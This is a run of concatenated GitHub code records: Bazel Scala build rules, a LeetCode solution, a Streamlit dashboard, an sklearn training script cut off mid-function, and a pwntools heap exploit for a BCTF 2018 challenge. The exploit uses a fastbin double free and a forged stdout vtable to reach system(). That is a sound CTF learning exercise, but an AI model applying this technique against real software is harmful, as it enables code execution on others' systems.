\"@io_bazel_rules_scala//scala:scala_maven_import_external.bzl\",\n _scala_maven_import_external = \"scala_maven_import_external\",\n)\nload(\n \"@io_bazel_rules_scala//scala:scala_cross_version.bzl\",\n _default_scala_version = \"default_scala_version\",\n _default_scala_version_jar_shas = \"default_scala_version_jar_shas\",\n _extract_major_version = \"extract_major_version\",\n _new_scala_default_repository = \"new_scala_default_repository\",\n)\nload(\n \"@io_bazel_rules_scala//specs2:specs2_junit.bzl\",\n _specs2_junit_dependencies = \"specs2_junit_dependencies\",\n)\nload(\n \"@io_bazel_rules_scala//scala:plusone.bzl\",\n _collect_plus_one_deps_aspect = \"collect_plus_one_deps_aspect\",\n)\nload(\n \"@io_bazel_rules_scala//scala:scala_doc.bzl\",\n _scala_doc = \"scala_doc\",\n)\n\n_launcher_template = {\n \"_java_stub_template\": attr.label(\n default = Label(\"@java_stub_template//file\"),\n ),\n}\n\n_implicit_deps = {\n \"_singlejar\": attr.label(\n executable = True,\n cfg = \"host\",\n default = Label(\"@bazel_tools//tools/jdk:singlejar\"),\n allow_files = True,\n ),\n \"_zipper\": attr.label(\n executable = True,\n cfg = \"host\",\n default = Label(\"@bazel_tools//tools/zip:zipper\"),\n allow_files = True,\n ),\n \"_java_toolchain\": attr.label(\n default = Label(\"@bazel_tools//tools/jdk:current_java_toolchain\"),\n ),\n \"_host_javabase\": attr.label(\n default = Label(\"@bazel_tools//tools/jdk:current_java_runtime\"),\n cfg = \"host\",\n ),\n \"_java_runtime\": attr.label(\n default = Label(\"@bazel_tools//tools/jdk:current_java_runtime\"),\n ),\n \"_scalac\": attr.label(\n default = Label(\n \"@io_bazel_rules_scala//src/java/io/bazel/rulesscala/scalac\",\n ),\n ),\n \"_exe\": attr.label(\n executable = True,\n cfg = \"host\",\n default = Label(\"@io_bazel_rules_scala//src/java/io/bazel/rulesscala/exe:exe\"),\n ),\n}\n\n# Single dep to allow IDEs to pickup all the implicit dependencies.\n_resolve_deps = {\n \"_scala_toolchain\": attr.label_list(\n default = [\n Label(\n \"//external:io_bazel_rules_scala/dependency/scala/scala_library\",\n ),\n ],\n allow_files = False,\n ),\n}\n\n_test_resolve_deps = {\n \"_scala_toolchain\": attr.label_list(\n default = [\n Label(\n \"//external:io_bazel_rules_scala/dependency/scala/scala_library\",\n ),\n Label(\n \"//external:io_bazel_rules_scala/dependency/scalatest/scalatest\",\n ),\n ],\n allow_files = False,\n ),\n}\n\n_junit_resolve_deps = {\n \"_scala_toolchain\": attr.label_list(\n default = [\n Label(\n \"//external:io_bazel_rules_scala/dependency/scala/scala_library\",\n ),\n Label(\"//external:io_bazel_rules_scala/dependency/junit/junit\"),\n Label(\n \"//external:io_bazel_rules_scala/dependency/hamcrest/hamcrest_core\",\n ),\n ],\n allow_files = False,\n ),\n}\n\n# Common attributes reused across multiple rules.\n_common_attrs_for_plugin_bootstrapping = {\n \"srcs\": attr.label_list(allow_files = [\n \".scala\",\n \".srcjar\",\n \".java\",\n ]),\n \"deps\": attr.label_list(aspects = [\n _collect_plus_one_deps_aspect,\n _coverage_replacements_provider.aspect,\n ]),\n \"plugins\": attr.label_list(allow_files = [\".jar\"]),\n \"runtime_deps\": attr.label_list(providers = [[JavaInfo]]),\n \"data\": attr.label_list(allow_files = True),\n \"resources\": attr.label_list(allow_files = True),\n \"resource_strip_prefix\": attr.string(),\n \"resource_jars\": attr.label_list(allow_files = True),\n \"scalacopts\": attr.string_list(),\n \"javacopts\": attr.string_list(),\n \"jvm_flags\": attr.string_list(),\n \"scalac_jvm_flags\": 
attr.string_list(),\n \"javac_jvm_flags\": attr.string_list(),\n \"expect_java_output\": attr.bool(\n default = True,\n mandatory = False,\n ),\n \"print_compile_time\": attr.bool(\n default = False,\n mandatory = False,\n ),\n}\n\n_common_attrs = {}\n\n_common_attrs.update(_common_attrs_for_plugin_bootstrapping)\n\n_common_attrs.update({\n # using stricts scala deps is done by using command line flag called 'strict_java_deps'\n # switching mode to \"on\" means that ANY API change in a target's transitive dependencies will trigger a recompilation of that target,\n # on the other hand any internal change (i.e. on code that ijar omits) WON’T trigger recompilation by transitive dependencies\n \"_dependency_analyzer_plugin\": attr.label(\n default = Label(\n \"@io_bazel_rules_scala//third_party/dependency_analyzer/src/main:dependency_analyzer\",\n ),\n allow_files = [\".jar\"],\n mandatory = False,\n ),\n \"unused_dependency_checker_mode\": attr.string(\n values = [\n \"warn\",\n \"error\",\n \"off\",\n \"\",\n ],\n mandatory = False,\n ),\n \"_unused_dependency_checker_plugin\": attr.label(\n default = Label(\n \"@io_bazel_rules_scala//third_party/unused_dependency_checker/src/main:unused_dependency_checker\",\n ),\n allow_files = [\".jar\"],\n mandatory = False,\n ),\n \"unused_dependency_checker_ignored_targets\": attr.label_list(default = []),\n \"_code_coverage_instrumentation_worker\": attr.label(\n default = \"@io_bazel_rules_scala//src/java/io/bazel/rulesscala/coverage/instrumenter\",\n allow_files = True,\n executable = True,\n cfg = \"host\",\n ),\n})\n\n_library_attrs = {\n \"main_class\": attr.string(),\n \"exports\": attr.label_list(\n allow_files = False,\n aspects = [_coverage_replacements_provider.aspect],\n ),\n}\n\n_common_outputs = {\n \"jar\": \"%{name}.jar\",\n \"deploy_jar\": \"%{name}_deploy.jar\",\n \"manifest\": \"%{name}_MANIFEST.MF\",\n \"statsfile\": \"%{name}.statsfile\",\n}\n\n_library_outputs = {}\n\n_library_outputs.update(_common_outputs)\n\n_scala_library_attrs = {}\n\n_scala_library_attrs.update(_implicit_deps)\n\n_scala_library_attrs.update(_common_attrs)\n\n_scala_library_attrs.update(_library_attrs)\n\n_scala_library_attrs.update(_resolve_deps)\n\nscala_library = rule(\n attrs = _scala_library_attrs,\n fragments = [\"java\"],\n outputs = _library_outputs,\n toolchains = [\"@io_bazel_rules_scala//scala:toolchain_type\"],\n implementation = _scala_library_impl,\n)\n\n# the scala compiler plugin used for dependency analysis is compiled using `scala_library`.\n# in order to avoid cyclic dependencies `scala_library_for_plugin_bootstrapping` was created for this purpose,\n# which does not contain plugin related attributes, and thus avoids the cyclic dependency issue\n_scala_library_for_plugin_bootstrapping_attrs = {}\n\n_scala_library_for_plugin_bootstrapping_attrs.update(_implicit_deps)\n\n_scala_library_for_plugin_bootstrapping_attrs.update(_library_attrs)\n\n_scala_library_for_plugin_bootstrapping_attrs.update(_resolve_deps)\n\n_scala_library_for_plugin_bootstrapping_attrs.update(\n _common_attrs_for_plugin_bootstrapping,\n)\n\nscala_library_for_plugin_bootstrapping = rule(\n attrs = _scala_library_for_plugin_bootstrapping_attrs,\n fragments = [\"java\"],\n outputs = _library_outputs,\n toolchains = [\"@io_bazel_rules_scala//scala:toolchain_type\"],\n implementation = _scala_library_for_plugin_bootstrapping_impl,\n)\n\n_scala_macro_library_attrs = {\n \"main_class\": attr.string(),\n \"exports\": attr.label_list(allow_files = 
False),\n}\n\n_scala_macro_library_attrs.update(_implicit_deps)\n\n_scala_macro_library_attrs.update(_common_attrs)\n\n_scala_macro_library_attrs.update(_library_attrs)\n\n_scala_macro_library_attrs.update(_resolve_deps)\n\n# Set unused_dependency_checker_mode default to off for scala_macro_library\n_scala_macro_library_attrs[\"unused_dependency_checker_mode\"] = attr.string(\n default = \"off\",\n values = [\n \"warn\",\n \"error\",\n \"off\",\n \"\",\n ],\n mandatory = False,\n)\n\nscala_macro_library = rule(\n attrs = _scala_macro_library_attrs,\n fragments = [\"java\"],\n outputs = _common_outputs,\n toolchains = [\"@io_bazel_rules_scala//scala:toolchain_type\"],\n implementation = _scala_macro_library_impl,\n)\n\n_scala_binary_attrs = {\n \"main_class\": attr.string(mandatory = True),\n \"classpath_resources\": attr.label_list(allow_files = True),\n}\n\n_scala_binary_attrs.update(_launcher_template)\n\n_scala_binary_attrs.update(_implicit_deps)\n\n_scala_binary_attrs.update(_common_attrs)\n\n_scala_binary_attrs.update(_resolve_deps)\n\nscala_binary = rule(\n attrs = _scala_binary_attrs,\n executable = True,\n fragments = [\"java\"],\n outputs = _common_outputs,\n toolchains = [\"@io_bazel_rules_scala//scala:toolchain_type\"],\n implementation = _scala_binary_impl,\n)\n\n_scala_test_attrs = {\n \"main_class\": attr.string(\n default = \"io.bazel.rulesscala.scala_test.Runner\",\n ),\n \"suites\": attr.string_list(),\n \"colors\": attr.bool(default = True),\n \"full_stacktraces\": attr.bool(default = True),\n \"_scalatest\": attr.label(\n default = Label(\n \"//external:io_bazel_rules_scala/dependency/scalatest/scalatest\",\n ),\n ),\n \"_scalatest_runner\": attr.label(\n cfg = \"host\",\n default = Label(\"//src/java/io/bazel/rulesscala/scala_test:runner\"),\n ),\n \"_scalatest_reporter\": attr.label(\n default = Label(\"//scala/support:test_reporter\"),\n ),\n \"_jacocorunner\": attr.label(\n default = Label(\"@bazel_tools//tools/jdk:JacocoCoverage\"),\n ),\n \"_lcov_merger\": attr.label(\n default = Label(\"@bazel_tools//tools/test/CoverageOutputGenerator/java/com/google/devtools/coverageoutputgenerator:Main\"),\n ),\n}\n\n_scala_test_attrs.update(_launcher_template)\n\n_scala_test_attrs.update(_implicit_deps)\n\n_scala_test_attrs.update(_common_attrs)\n\n_scala_test_attrs.update(_test_resolve_deps)\n\nscala_test = rule(\n attrs = _scala_test_attrs,\n executable = True,\n fragments = [\"java\"],\n outputs = _common_outputs,\n test = True,\n toolchains = [\"@io_bazel_rules_scala//scala:toolchain_type\"],\n implementation = _scala_test_impl,\n)\n\n_scala_repl_attrs = {}\n\n_scala_repl_attrs.update(_launcher_template)\n\n_scala_repl_attrs.update(_implicit_deps)\n\n_scala_repl_attrs.update(_common_attrs)\n\n_scala_repl_attrs.update(_resolve_deps)\n\nscala_repl = rule(\n attrs = _scala_repl_attrs,\n executable = True,\n fragments = [\"java\"],\n outputs = _common_outputs,\n toolchains = [\"@io_bazel_rules_scala//scala:toolchain_type\"],\n implementation = _scala_repl_impl,\n)\n\ndef _default_scala_extra_jars():\n return {\n \"2.11\": {\n \"scalatest\": {\n \"version\": \"3.0.5\",\n \"sha256\": \"2aafeb41257912cbba95f9d747df9ecdc7ff43f039d35014b4c2a8eb7ed9ba2f\",\n },\n \"scalactic\": {\n \"version\": \"3.0.5\",\n \"sha256\": \"84723064f5716f38990fe6e65468aa39700c725484efceef015771d267341cf2\",\n },\n \"scala_xml\": {\n \"version\": \"1.0.5\",\n \"sha256\": \"767e11f33eddcd506980f0ff213f9d553a6a21802e3be1330345f62f7ee3d50f\",\n },\n \"scala_parser_combinators\": {\n \"version\": 
\"1.0.4\",\n \"sha256\": \"0dfaafce29a9a245b0a9180ec2c1073d2bd8f0330f03a9f1f6a74d1bc83f62d6\",\n },\n },\n \"2.12\": {\n \"scalatest\": {\n \"version\": \"3.0.5\",\n \"sha256\": \"b416b5bcef6720da469a8d8a5726e457fc2d1cd5d316e1bc283aa75a2ae005e5\",\n },\n \"scalactic\": {\n \"version\": \"3.0.5\",\n \"sha256\": \"57e25b4fd969b1758fe042595112c874dfea99dca5cc48eebe07ac38772a0c41\",\n },\n \"scala_xml\": {\n \"version\": \"1.0.5\",\n \"sha256\": \"035015366f54f403d076d95f4529ce9eeaf544064dbc17c2d10e4f5908ef4256\",\n },\n \"scala_parser_combinators\": {\n \"version\": \"1.0.4\",\n \"sha256\": \"282c78d064d3e8f09b3663190d9494b85e0bb7d96b0da05994fe994384d96111\",\n },\n },\n }\n\ndef scala_repositories(\n scala_version_shas = (\n _default_scala_version(),\n _default_scala_version_jar_shas(),\n ),\n maven_servers = [\"http://central.maven.org/maven2\"],\n scala_extra_jars = _default_scala_extra_jars()):\n (scala_version, scala_version_jar_shas) = scala_version_shas\n major_version = _extract_major_version(scala_version)\n\n _new_scala_default_repository(\n maven_servers = maven_servers,\n scala_version = scala_version,\n scala_version_jar_shas = scala_version_jar_shas,\n )\n\n scala_version_extra_jars = scala_extra_jars[major_version]\n\n _scala_maven_import_external(\n name = \"io_bazel_rules_scala_scalatest\",\n artifact = \"org.scalatest:scalatest_{major_version}:{extra_jar_version}\".format(\n major_version = major_version,\n extra_jar_version = scala_version_extra_jars[\"scalatest\"][\"version\"],\n ),\n jar_sha256 = scala_version_extra_jars[\"scalatest\"][\"sha256\"],\n licenses = [\"notice\"],\n server_urls = maven_servers,\n )\n _scala_maven_import_external(\n name = \"io_bazel_rules_scala_scalactic\",\n artifact = \"org.scalactic:scalactic_{major_version}:{extra_jar_version}\".format(\n major_version = major_version,\n extra_jar_version = scala_version_extra_jars[\"scalactic\"][\"version\"],\n ),\n jar_sha256 = scala_version_extra_jars[\"scalactic\"][\"sha256\"],\n licenses = [\"notice\"],\n server_urls = maven_servers,\n )\n\n _scala_maven_import_external(\n name = \"io_bazel_rules_scala_scala_xml\",\n artifact = \"org.scala-lang.modules:scala-xml_{major_version}:{extra_jar_version}\".format(\n major_version = major_version,\n extra_jar_version = scala_version_extra_jars[\"scala_xml\"][\"version\"],\n ),\n jar_sha256 = scala_version_extra_jars[\"scala_xml\"][\"sha256\"],\n licenses = [\"notice\"],\n server_urls = maven_servers,\n )\n\n _scala_maven_import_external(\n name = \"io_bazel_rules_scala_scala_parser_combinators\",\n artifact =\n \"org.scala-lang.modules:scala-parser-combinators_{major_version}:{extra_jar_version}\".format(\n major_version = major_version,\n extra_jar_version = scala_version_extra_jars[\"scala_parser_combinators\"][\"version\"],\n ),\n jar_sha256 = scala_version_extra_jars[\"scala_parser_combinators\"][\"sha256\"],\n licenses = [\"notice\"],\n server_urls = maven_servers,\n )\n\n # used by ScalacProcessor\n _scala_maven_import_external(\n name = \"scalac_rules_commons_io\",\n artifact = \"commons-io:commons-io:2.6\",\n jar_sha256 = \"f877d304660ac2a142f3865badfc971dec7ed73c747c7f8d5d2f5139ca736513\",\n licenses = [\"notice\"],\n server_urls = maven_servers,\n )\n\n _scala_maven_import_external(\n name = \"io_bazel_rules_scala_guava\",\n artifact = \"com.google.guava:guava:21.0\",\n jar_sha256 = \"972139718abc8a4893fa78cba8cf7b2c903f35c97aaf44fa3031b0669948b480\",\n licenses = [\"notice\"],\n server_urls = maven_servers,\n )\n\n _scala_maven_import_external(\n 
name = \"io_bazel_rules_scala_org_jacoco_org_jacoco_core\",\n artifact = \"org.jacoco:org.jacoco.core:0.7.5.201505241946\",\n jar_sha256 = \"ecf1ad8192926438d0748bfcc3f09bebc7387d2a4184bb3a171a26084677e808\",\n licenses = [\"notice\"],\n server_urls = maven_servers,\n )\n\n _scala_maven_import_external(\n name = \"io_bazel_rules_scala_org_ow2_asm_asm_debug_all\",\n artifact = \"org.ow2.asm:asm-debug-all:5.0.1\",\n jar_sha256 = \"4734de5b515a454b0096db6971fb068e5f70e6f10bbee2b3bd2fdfe5d978ed57\",\n licenses = [\"notice\"],\n server_urls = maven_servers,\n )\n\n # Using this and not the bazel regular one due to issue when classpath is too long\n # until https://github.com/bazelbuild/bazel/issues/6955 is resolved\n if not native.existing_rule(\"java_stub_template\"):\n http_archive(\n name = \"java_stub_template\",\n sha256 = \"1859a37dccaee8c56b98869bf1f22f6f5b909606aff74ddcfd59e9757a038dd5\",\n urls = [\"https://github.com/bazelbuild/rules_scala/archive/8b8271e3ee5709e1340b19790d0b396a0ff3dd0f.tar.gz\"],\n strip_prefix = \"rules_scala-8b8271e3ee5709e1340b19790d0b396a0ff3dd0f/java_stub_template\",\n )\n\n if not native.existing_rule(\"com_google_protobuf\"):\n http_archive(\n name = \"com_google_protobuf\",\n sha256 = \"d82eb0141ad18e98de47ed7ed415daabead6d5d1bef1b8cccb6aa4d108a9008f\",\n strip_prefix = \"protobuf-b4f193788c9f0f05d7e0879ea96cd738630e5d51\",\n # Commit from 2019-05-15, update to protobuf 3.8 when available.\n url = \"https://github.com/protocolbuffers/protobuf/archive/b4f193788c9f0f05d7e0879ea96cd738630e5d51.tar.gz\",\n )\n\n if not native.existing_rule(\"zlib\"): # needed by com_google_protobuf\n http_archive(\n name = \"zlib\",\n build_file = \"@com_google_protobuf//:third_party/zlib.BUILD\",\n sha256 = \"c3e5e9fdd5004dcb542feda5ee4f0ff0744628baf8ed2dd5d66f8ca1197cb1a1\",\n strip_prefix = \"zlib-1.2.11\",\n urls = [\"https://zlib.net/zlib-1.2.11.tar.gz\"],\n )\n\n native.bind(\n name = \"io_bazel_rules_scala/dependency/com_google_protobuf/protobuf_java\",\n actual = \"@com_google_protobuf//:protobuf_java\",\n )\n\n native.bind(\n name = \"io_bazel_rules_scala/dependency/commons_io/commons_io\",\n actual = \"@scalac_rules_commons_io//jar\",\n )\n\n native.bind(\n name = \"io_bazel_rules_scala/dependency/scalatest/scalatest\",\n actual = \"@io_bazel_rules_scala//scala/scalatest:scalatest\",\n )\n\n native.bind(\n name = \"io_bazel_rules_scala/dependency/scala/scala_compiler\",\n actual = \"@io_bazel_rules_scala_scala_compiler\",\n )\n\n native.bind(\n name = \"io_bazel_rules_scala/dependency/scala/scala_library\",\n actual = \"@io_bazel_rules_scala_scala_library\",\n )\n\n native.bind(\n name = \"io_bazel_rules_scala/dependency/scala/scala_reflect\",\n actual = \"@io_bazel_rules_scala_scala_reflect\",\n )\n\n native.bind(\n name = \"io_bazel_rules_scala/dependency/scala/scala_xml\",\n actual = \"@io_bazel_rules_scala_scala_xml\",\n )\n\n native.bind(\n name = \"io_bazel_rules_scala/dependency/scala/parser_combinators\",\n actual = \"@io_bazel_rules_scala_scala_parser_combinators\",\n )\n\n native.bind(\n name = \"io_bazel_rules_scala/dependency/scala/guava\",\n actual = \"@io_bazel_rules_scala_guava\",\n )\n\ndef _sanitize_string_for_usage(s):\n res_array = []\n for idx in range(len(s)):\n c = s[idx]\n if c.isalnum() or c == \".\":\n res_array.append(c)\n else:\n res_array.append(\"_\")\n return \"\".join(res_array)\n\n# This auto-generates a test suite based on the passed set of targets\n# we will add a root test_suite with the name of the passed name\ndef 
scala_test_suite(\n name,\n srcs = [],\n visibility = None,\n use_short_names = False,\n **kwargs):\n ts = []\n i = 0\n for test_file in srcs:\n i = i + 1\n n = (\"%s_%s\" % (name, i)) if use_short_names else (\"%s_test_suite_%s\" % (name, _sanitize_string_for_usage(test_file)))\n scala_test(\n name = n,\n srcs = [test_file],\n visibility = visibility,\n unused_dependency_checker_mode = \"off\",\n **kwargs\n )\n ts.append(n)\n native.test_suite(name = name, tests = ts, visibility = visibility)\n\n# Scala library suite generates a series of scala libraries\n# then it depends on them with a meta one which exports all the sub targets\ndef scala_library_suite(\n name,\n srcs = [],\n exports = [],\n visibility = None,\n **kwargs):\n ts = []\n for src_file in srcs:\n n = \"%s_lib_%s\" % (name, _sanitize_string_for_usage(src_file))\n scala_library(\n name = n,\n srcs = [src_file],\n visibility = visibility,\n exports = exports,\n unused_dependency_checker_mode = \"off\",\n **kwargs\n )\n ts.append(n)\n scala_library(\n name = name,\n visibility = visibility,\n exports = exports + ts,\n deps = ts,\n )\n\n_scala_junit_test_attrs = {\n \"prefixes\": attr.string_list(default = []),\n \"suffixes\": attr.string_list(default = []),\n \"suite_label\": attr.label(\n default = Label(\n \"//src/java/io/bazel/rulesscala/test_discovery:test_discovery\",\n ),\n ),\n \"suite_class\": attr.string(\n default = \"io.bazel.rulesscala.test_discovery.DiscoveredTestSuite\",\n ),\n \"print_discovered_classes\": attr.bool(\n default = False,\n mandatory = False,\n ),\n \"_junit\": attr.label(\n default = Label(\n \"//external:io_bazel_rules_scala/dependency/junit/junit\",\n ),\n ),\n \"_hamcrest\": attr.label(\n default = Label(\n \"//external:io_bazel_rules_scala/dependency/hamcrest/hamcrest_core\",\n ),\n ),\n \"_bazel_test_runner\": attr.label(\n default = Label(\n \"@io_bazel_rules_scala//scala:bazel_test_runner_deploy\",\n ),\n allow_files = True,\n ),\n}\n\n_scala_junit_test_attrs.update(_launcher_template)\n\n_scala_junit_test_attrs.update(_implicit_deps)\n\n_scala_junit_test_attrs.update(_common_attrs)\n\n_scala_junit_test_attrs.update(_junit_resolve_deps)\n\n_scala_junit_test_attrs.update({\n \"tests_from\": attr.label_list(providers = [[JavaInfo]]),\n})\n\nscala_junit_test = rule(\n attrs = _scala_junit_test_attrs,\n fragments = [\"java\"],\n outputs = _common_outputs,\n test = True,\n toolchains = [\"@io_bazel_rules_scala//scala:toolchain_type\"],\n implementation = _scala_junit_test_impl,\n)\n\ndef scala_specs2_junit_test(name, **kwargs):\n scala_junit_test(\n name = name,\n deps = _specs2_junit_dependencies() + kwargs.pop(\"deps\", []),\n unused_dependency_checker_ignored_targets =\n _specs2_junit_dependencies() + kwargs.pop(\"unused_dependency_checker_ignored_targets\", []),\n suite_label = Label(\n \"//src/java/io/bazel/rulesscala/specs2:specs2_test_discovery\",\n ),\n suite_class = \"io.bazel.rulesscala.specs2.Specs2DiscoveredTestSuite\",\n **kwargs\n )\n\nscala_doc = _scala_doc","repo_name":"mackenziestarr/rules_scala","sub_path":"scala/scala.bzl","file_name":"scala.bzl","file_ext":"bzl","file_size_in_byte":23337,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"48"} +{"seq_id":"39086642746","text":"class Solution:\n def combine(self, n: int, k: int) -> List[List[int]]:\n def backtrack(idx, res, temp, nums):\n if len(list(temp)) == k:\n res.append(list(temp))\n\n for i in range(idx, len(nums)):\n temp.append(nums[i])\n backtrack(i+1, res, temp, nums)\n temp.pop()\n \n 
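# Hypothetical usage note (illustration only, not from the original file): Solution().combine(4, 2)\n        # would return every 2-element combination of [1, 2, 3, 4], i.e. [1,2], [1,3], [1,4], [2,3], [2,4], [3,4].\n        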
{"seq_id":"39086642746","text":"from typing import List\n\nclass Solution:\n    def combine(self, n: int, k: int) -> List[List[int]]:\n        def backtrack(idx, res, temp, nums):\n            if len(temp) == k:\n                res.append(list(temp))\n                return  # a full combination is recorded; going deeper would be wasted work\n\n            for i in range(idx, len(nums)):\n                temp.append(nums[i])\n                backtrack(i+1, res, temp, nums)\n                temp.pop()\n\n        nums = []\n        for i in range(1,n+1):\n            nums.append(i)\n\n        res, temp = [], []\n\n        backtrack(0,res,temp,nums)\n\n        return res","repo_name":"CodEZ47/A2SV_programming","sub_path":"combinations.py","file_name":"combinations.py","file_ext":"py","file_size_in_byte":528,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
{"seq_id":"73127220305","text":"import streamlit as st\nimport pandas as pd\n\nclass MyDashboard():\n    def __init__(self, df=None):\n        super(MyDashboard, self).__init__()\n        self.df = df\n\n        if self.df is None:\n            self.ReadDataBase()\n\n        btn = st.sidebar.button(\"Click\")\n        cmb = st.sidebar.selectbox(\"Options\", [])  # Streamlit has no ComboBox widget; selectbox is the equivalent\n        if btn:\n            self.TesteClick()\n\n    def ReadDataBase(self):\n        self.df = pd.read_csv(r\"db/vgsales.csv\")\n        print(\"Teste\")\n\n    def TesteClick(self):\n        print(\"Click button\")\n        st.bar_chart(self.df[[\"Platform\",\"Rank\", \"Year\"]], x=\"Platform\",y=\"Year\")\n\nif __name__ == \"__main__\":\n    MyDashboard()","repo_name":"MarcosNack/dashboard","sub_path":"mydatabase.py","file_name":"mydatabase.py","file_ext":"py","file_size_in_byte":673,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
{"seq_id":"3648631083","text":"from pwn import *\n\ncontext.log_level = 'debug'\np = process(\"./easiest\")\n\nstd_got = 0x60207a # GOT entry that holds the stdout pointer\nsys_addr = 0x400946 # address of the system() call inside the binary\nptr_addr = 0x6020C0 # pointer array that stores the allocated chunks\n\ndef add(idx,size,content):\n\tp.recvuntil(\"2 delete \")\n\tp.sendline(\"1\")\n\tp.recvuntil(\"(0-11):\")\n\tp.sendline(str(idx))\n\tp.recvuntil(\"Length:\")\n\tp.sendline(str(size))\n\tp.recvuntil(\"C:\")\n\tp.sendline(content)\n\t\ndef delete(idx):\n\tp.recvuntil(\"2 delete \")\n\tp.sendline(\"2\")\n\tp.recvuntil(\"(0-11):\")\n\tp.sendline(str(idx))\n\nif __name__=='__main__':\n\t\n\tpayload = p64(0xdeadbeef)*7+p64(sys_addr)\n\tadd(6,0x200,payload) # overwrite the vtable pointer in stdout with this chunk's address; printf ends up calling xsputn, the 8th entry of the vtable\n\t# tune which chunks get allocated, making sure that:\n\t# (1) _lock in the IO_FILE struct points to writable memory\n\t# (2) mode is 0\n\tadd(0,0x30,\"a\"*0x10)\t\n\tadd(1,0x30,\"a\"*0x10)\t\n\tadd(2,0x30,\"1\"*0x10)\t\n\tadd(4,0x100,'p'*0x10)\n\n\tdelete(2)\n\tdelete(0)\n\tdelete(2) # fastbin double-free attack to rewrite stdout's entry in the GOT\n\n\tadd(2,0x30,p64(std_got))\n\tadd(0,0x30,'xxxx')\n\tadd(0,0x30,'xxxx')\n\t#gdb.attach(p)\n\tadd(2,0x30,'x'*0x16+p64(ptr_addr+8*6-0xd8)) # on 64-bit the vtable sits at offset 0xd8 inside _IO_FILE_plus,\n\t# so stdout's address plus 0xd8 holds the vtable pointer, i.e. the address of chunk 6\n\tp.sendline('aaaa')\n\tp.interactive()\n","repo_name":"De4dCr0w/ctf-pwn","sub_path":"BCTF-2018/pwn/exp-stdout.py","file_name":"exp-stdout.py","file_ext":"py","file_size_in_byte":1366,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"}
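The free(2)/free(0)/free(2) sequence in the exploit above relies on glibc's fastbin double-free check comparing the freed chunk only against the current list head. A toy model of that check in plain Python (illustrative only — no real heap involved; classic pre-tcache fastbin behavior assumed):

def fastbin_free(fastbin, chunk):
    # glibc aborts only when the freed chunk equals the current fastbin head
    if fastbin and fastbin[0] == chunk:
        raise RuntimeError("double free or corruption (fasttop)")
    fastbin.insert(0, chunk)

fb = []
fastbin_free(fb, "chunk2")
fastbin_free(fb, "chunk0")  # chunk0 now hides chunk2 from the head check
fastbin_free(fb, "chunk2")  # accepted, so chunk2 sits in the list twice
print(fb)  # ['chunk2', 'chunk0', 'chunk2'] -- the second chunk2 can later be handed out with a forged fd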
{"seq_id":"71209004306","text":"import pandas as pd\nimport numpy as np\nfrom sklearn.svm import SVC\nfrom sklearn.externals import joblib\nfrom sklearn import preprocessing\nfrom sklearn.cross_validation import StratifiedShuffleSplit\nfrom sklearn.grid_search import GridSearchCV\nfrom sklearn.metrics import confusion_matrix\nfrom sklearn import metrics\nfrom sklearn.metrics import precision_recall_curve\n\nfrom matplotlib.colors import ListedColormap\nfrom sklearn.cross_validation import train_test_split\nfrom sklearn.preprocessing import StandardScaler\n\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.svm import SVC\nfrom sklearn.tree import DecisionTreeClassifier\nfrom sklearn.ensemble import RandomForestClassifier, AdaBoostClassifier\nfrom sklearn.naive_bayes import GaussianNB\nfrom sklearn.discriminant_analysis import LinearDiscriminantAnalysis\nfrom sklearn.discriminant_analysis import QuadraticDiscriminantAnalysis\nfrom sklearn.metrics import classification_report\nfrom sklearn.ensemble import ExtraTreesClassifier\nfrom sklearn.feature_selection import SelectKBest\n\nfrom sklearn.metrics import average_precision_score\nimport matplotlib.pyplot as plt\nimport os\n\nfrom sklearn.datasets import load_svmlight_files\nfrom sklearn import cross_validation\nfrom sklearn.ensemble import VotingClassifier, BaggingClassifier\n\nfrom CategoryClassifier import CategoryClassifier\nfrom xgboost import XGBClassifier\n\ndef read_data_set(path, rows_to_skip):\n    ds = pd.read_csv(path,sep='\\t', skiprows=rows_to_skip, header=None)\n    return ds\n\ndef trainKNN(X_train,y_train):\n    #normalization\n    scaler = preprocessing.StandardScaler().fit(X_train)\n    filename = 'KNNTrainScalar.joblib.pkl'\n    joblib.dump(scaler, filename, compress=9)\n    XTrainScaled = scaler.transform(X_train)\n\n    # cross fitting\n    # neighbors_range = [2,4,8,16,32,64]\n    neighbors_range = [16,32]\n\n    distance_types = ['chebyshev', 'sokalmichener',\n                      'canberra', #'haversine',\n                      #'rogerstanimoto', 'matching',\n                      'dice', 'euclidean',\n                      'braycurtis', 'russellrao',\n                      'cityblock', 'manhattan',\n                      #'infinity', 'jaccard',\n                      #'sokalsneath', # 'seuclidean',\n                      #'kulsinski', 'minkowski',\n                      #'mahalanobis', 'p',\n                      #'l2', 'hamming',\n                      #'l1', #'wminkowski',\n                      #'pyfunc']\n                      ]\n\n\n\n    algorithms=['ball_tree']\n\n    param_grid = dict(algorithm=algorithms, n_neighbors=neighbors_range, metric=distance_types)\n    cv = StratifiedShuffleSplit(y_train, n_iter=5, test_size=0.2, random_state=42)\n    grid = GridSearchCV(KNeighborsClassifier(), param_grid=param_grid,\n                        n_jobs=-1, cv=cv, verbose=100)\n    grid.fit(XTrainScaled, y_train)\n\n    print(\"The best parameters are %s with a score of %0.2f\" % (grid.best_params_, grid.best_score_))\n\n    # train by best params\n    n_neighbors = grid.best_params_['n_neighbors']\n    metric = grid.best_params_['metric']\n\n    clf_opt = KNeighborsClassifier(n_neighbors=n_neighbors, metric=metric)\n    clf_opt.fit(XTrainScaled, y_train)\n\n    filename = 'KNN.joblib.pkl'\n    joblib.dump(clf_opt, filename, compress=9)\n\ndef testKNN(X_test,y_test):\n    clf = joblib.load('KNN.joblib.pkl')\n    scaler = joblib.load('KNNTrainScalar.joblib.pkl')\n    X_testScaled = scaler.transform(X_test)\n    y_pred = clf.predict(X_testScaled)\n    print('KNN precision: ',metrics.precision_score(y_test, y_pred))\n    print('KNN accuracy: ',metrics.accuracy_score(y_test, y_pred))\n    precision, recall, threshold = precision_recall_curve(y_test, y_pred)\n\ndef trainSVC_RBF(X_train,y_train):\n    #normalization\n    scaler = preprocessing.StandardScaler().fit(X_train)\n    filename = 'TrainScalar.joblib.pkl'\n    joblib.dump(scaler, filename, compress=9)\n    XTrainScaled = scaler.transform(X_train)\n\n    # cross fitting\n    C_range = 